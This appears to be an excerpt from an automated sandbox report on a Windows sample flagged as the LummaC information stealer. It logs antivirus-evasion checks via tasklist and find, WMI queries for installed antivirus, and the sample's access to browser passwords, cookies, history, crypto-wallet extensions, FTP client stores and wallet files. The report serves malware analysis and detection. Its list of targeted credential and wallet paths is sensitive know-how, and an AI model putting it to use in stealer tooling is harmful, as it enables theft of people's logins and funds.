              Source: C:\Users\user\AppData\Local\Temp\is-O1T1E.tmp\X4PCDQPDT1B8IDPB7SN83.tmpProcess created: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe "C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: Produces.com, 0000000B.00000000.1689720330.0000000000273000.00000002.00000001.01000000.00000007.sdmp, ulu_mon.exe, 0000002F.00000002.3162136925.0000000006051000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drBinary or memory string: Shell_TrayWnd
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drBinary or memory string: Shell_TrayWndTrayNotifyWndSV
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drBinary or memory string: Shell_TrayWndU
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\UltraMedia\ulu_mon.exeQueries volume information: C:\Users\user\AppData\Local\Temp\a329edd1 VolumeInformation
              Source: C:\Users\user\Desktop\FloydMounts.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: find.exe, 00000026.00000002.3009449248.000001F0BDBB4000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000026.00000002.3009344801.000001F0BD9DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\174436\Produces.comDirectory queried: C:\Users\user\DocumentsJump to behavior
